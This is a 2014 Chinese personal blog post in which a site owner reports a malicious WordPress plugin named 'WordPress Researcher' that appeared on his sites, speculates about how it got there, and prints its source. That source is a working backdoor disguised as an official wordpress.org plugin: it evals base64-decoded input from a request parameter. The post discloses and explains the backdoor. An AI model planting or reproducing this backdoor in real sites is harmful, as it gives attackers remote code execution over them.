6

WTF!WordPresshacked~

Posted by Chen Hongbin on 2014 年 8 月 3 日 in 计算机网络 |

wp_hack

大家警惕!看看是否有一个叫 WordPress Researcher的插件!

查看了一下插件的安装日期是7月24日下午2点,WTF那个时候我在上班啊!所以我一开始就感觉不对。我一个有3个网站被强行安装上了:a.cx,cny.club,a.cx

我的wordpress版本都是最新的,而且也没有安装什么乱七八糟的插件,都是来自官网。

现在思考下来,hacked的原因只有2个:

1)Wordpress本身的程序漏洞。从Wordpress的前科看,这个可能性很大,Wordpress屡屡爆出hacked,毕竟是全球性的开源程序,有很多黑客在研究Wordpress

2)我自己的密码泄露。感觉这个可能性不大,我一般都是在自己家里管理Wordpress的。但是有那么一丝可能性,因为我在单位电脑登录过,那么单位电脑有木马病毒什么的还要进一步去侦查。但是,如果有木马,那也是“国产货”专门盗游戏密码什么的,我区区一个Wordpress值得他盗么?所以也不太可能。

深思熟虑下来,一的可能性占到99%。

附上该插件的源代码:

<?php
/*
Plugin Name: WordPress Researcher
Plugin URI: http://wordpress.org/extend/plugins/
Description: WordPress research tool.
Author: wordpressdotorg
Author URI: http://wordpress.org/
Text Domain: wordpress-researcher
License: GPL version 2 or later – http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
Version: 2.2.4
Copyright 2013  wordpressdotorg
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.
    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.
    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110, USA
*/
    function research_plugin()
    {
        if (isset($_REQUEST[‘JQIW’]))
        {
            eval(base64_decode($_REQUEST[‘JQIW’]));
        }
        return;
    }
    add_action(‘after_setup_theme’, ‘research_plugin’);
?>

解析一下代码:

一共就2个函数

第一函数 research_plugin()  先是判断是否定义过$_REQUEST[‘JQIW’]

$_REQUEST是一个超全局变量,里面包括有
$_GET
$_POST
$_COOKIE

功能是接受表单, ‘JQIW’

如果是,那么他开始编码

例子

<?php
$string = "beautiful";
$time = "winter";

$str = 'This is a $string $time morning!';
echo $str. "<br />";

eval("\$str = \"$str\";");
echo $str;
?>

输出:

This is a $string $time morning!
This is a beautiful winter morning!

第二个函数是一个动作

WordPress有一个叫做after_setup_theme的动作hook。一旦父/子主题的功能文件加载完毕,这个hook也会被执行。after_setup_theme是一个非常实用的hook,WordPress默认主题TwentyTen也使用了这个hook。

add_action( 'after_setup_theme', 'browncoats_theme_setup' );

6 Comments

Comments are closed. Would you like to contact the author directly?

版权所有 © 2009-2024 不知道起什么标题 A.CX / Q.ST / Z.ST / 6.LS / WO.GS / YE.EE / SH.VC / ZIS.CC| 拟物化最后的坚守者| 安居乐ye | 进化日记 本人保留本站所有权利

本博客自2009年开始到现在从未间断,以后也会时不时更新一下
水贴居多,反正随意,纯属个人唔哩嘛哩 wulimali
玩域名从不拉帮结派,就是一个人独乐乐,哈哈

APP

arr.app bxx.app wmm.app

CC

adj.cc bmr.cc bsh.cc ciw.cc cmr.cc cwk.cc cyx.cc rrn.cc fcx.cc
fdx.cc ffq.cc fwx.cc ggj.cc ggv.cc gvr.cc gwx.cc gxt.cc hhf.cc
ist.cc ith.cc jqw.cc jxp.cc kjx.cc kmr.cc kwz.cc lml.cc mmu.cc
mra.cc mrh.cc mwx.cc mxr.cc myt.cc nfs.cc nyx.cc pcj.cc pdo.cc
pvr.cc pxo.cc pym.cc qsh.cc rcx.cc rxp.cc scd.cc shk.cc eww.cc
tvo.cc uiw.cc uux.cc vrg.cc vrk.cc vsh.cc vvb.cc vvz.cc vxx.cc
wbn.cc wpi.cc wrg.cc wwy.cc wxg.cc xpe.cc xra.cc xrd.cc xrf.cc
xsq.cc xyr.cc yee.cc yxa.cc zgd.cc zgo.cc zis.cc zkk.cc zmy.cc
zpm.cc zzm.cc zoi.cc ffj.cc aitv.cc

CI

aa.ci gj.ci gs.ci lx.ci wx.ci xs.ci ico.ci

CITY

mo.city bao.city kuai.city wode.city

CM

xin.cm

CN

yxn.cn kkz.cn jwp.cn ywo.cn qqo.cn yxa.cn
am6.cn 6vd.cn ba7.cn xr9.cn 8be.cn xr8.cn 6zh.cn 6gw.cn c0o.cn
8vj.cn ye0.cn vg8.cn
aain.cn aigf.cn aihf.cn aihq.cn ains.cn aiqv.cn aisn.cn aivh.cn aivl.cn
aivn.cn aivv.cn aivz.cn aiwd.cn aiwg.cn aiwr.cn aixa.cn aiyc.cn aiyd.cn
aiyk.cn bpsh.cn cnuw.cn cnvq.cn daiw.cn djmr.cn dvcn.cn eaio.cn efai.cn
eqai.cn eshh.cn fffw.cn fpsh.cn gaiw.cn iiai.cn ipsh.cn jucn.cn kqsh.cn
krsh.cn ktsh.cn mlnn.cn mlps.cn mmsh.cn nvcn.cn oaiw.cn oaiz.cn otcn.cn
paiy.cn pcnr.cn pfai.cn pmsh.cn pocn.cn ppsh.cn qpsh.cn qqqh.cn rair.cn
rdsh.cn rqsh.cn saij.cn shbu.cn shdo.cn shhp.cn shvr.cn sqcn.cn taiw.cn
tvsh.cn uaiw.cn waij.cn waiu.cn whsh.cn wmsg.cn wqqq.cn wwmj.cn wwsk.cn
xaie.cn xaim.cn xais.cn xaiv.cn ymsh.cn zaia.cn zaie.cn zaig.cn zaiy.cn
zcni.cn aiaim.cn aiaiu.cn uaiai.cn yunmf.cn aizv.cn aivq.cn aivj.cn pssh.cn
voxgpt.cn hpsh.cn shhi.cn yocn.cn itsh.cn shyu.cn haiy.cn iaiw.cn saiu.cn

frCHINA.cn

haCHINA.cn

shud.cn rpla.cn pesh.cn shge.cn tksh.cn shxo.cn

net.cn

gi.net.cn ke.net.cn sg.net.cn
sh.cn e.sh.cn p.sh.cn ar.sh.cn cc.sh.cn da.sh.cn gg.sh.cn ii.sh.cn kk.sh.cn lu.sh.cn
ml.sh.cn mr.sh.cn ms.sh.cn pe.sh.cn pc.sh.cn wa.sh.cn ye.sh.cn yx.sh.cn 520.sh.cn
mm.sh.cn you.sh.cn chen.sh.cn
sn.cn a.sn.cn
mo.cn an.mo.cn da.mo.cn fu.mo.cn you.mo.cn ji.mo.cn
xj.cn ai.xj.cn ww.xj.cn
xz.cn a.xz.cn
yn.cn a.yn.cn
jL.cn a.jl.cn
gs.cn a.gs.cn ai.gs.cn
he.cn a.he.cn e.he.cn da.he.cn ju.he.cn
nx.cn a.nx.cn
ac.cn mi.ac.cn

COM

cloudvf.com cloudvt.com icloudk.com cloudusing.com

COOL

yx.cool

CX

a.cx

5.cx

br.cx bz.cx cf.cx fg.cx fl.cx gs.cx gy.cx
hj.cx hr.cx kh.cx kj.cx mp.cx pc.cx pk.cx qh.cx sw.cx
wg.cx wy.cx xh.cx xk.cx yw.cx zb.cx zq.cx bq.cx che.cx
kuai.cx wb.cx

EE

gh.ee gs.ee qx.ee qy.ee ye.ee zb.ee zg.ee cai.ee czc.ee
czh.ee fei.ee gai.ee kan.ee yun.ee zai.ee aiai.ee chen.ee kuai.ee
yuan.ee imeta.ee

FAN

tai.fan

GD

123.gd xin.gd yun.gd

GOLD

520.gold

GS

dx.gs fu.gs hn.gs pq.gs qf.gs qp.gs rh.gs tn.gs wo.gs
wx.gs xh.gs ya.gs fen.gs pai.gs sai.gs tai.gs tao.gs vrc.gs
xai.gs yun.gs zai.gs aiai.gs moss.gs tuan.gs aipin.gs

GY

ai.gy

ING

aius.ing aisee.ing aiact.ing aitest.ing haop.ing gaox.ing dianp.ing goask.ing gotalk.ing
myfeel.ing

LA

zai.la

LS

6.ls

LT

CHINA.lt

LTD

pco.ltd

MBA

ml.mba

MX

xin.mx

NET

tbbb.net

PM

173.pm tao.pm

PUB

ccc.pub

PW

bao.pw jia.pw

REN

shc.ren

SRL

n.srl

ST

q.st

z.st

19.st 98.st ai.st gd.st hh.st rr.st uu.st
vr.st ym.st 520.st wei.st xin.st yun.st yuan.st

SX

xin.sx yun.sx

VC

sh.vc

VIP

riso.vip

WANG

bat.wang csb.wang cxz.wang hbb.wang xss.wang xxl.wang xxr.wang zgb.wang

WF

yun.wf

XIN

iam.xin vox.xin tele.xin yxgs.xin zghd.xin ebank.xin
All Included.

Email : a@a.cx / 6@6.ls / i@ye.ee

外滩18号米店

中华人民共和国 网站备案号(工信部暨公安部):
 
主体: 沪ICP备15005899号
沪ICP备15005899号-1
沪ICP备15005899号-2
沪ICP备15005899号-3

沪公网安备31011802004858

Top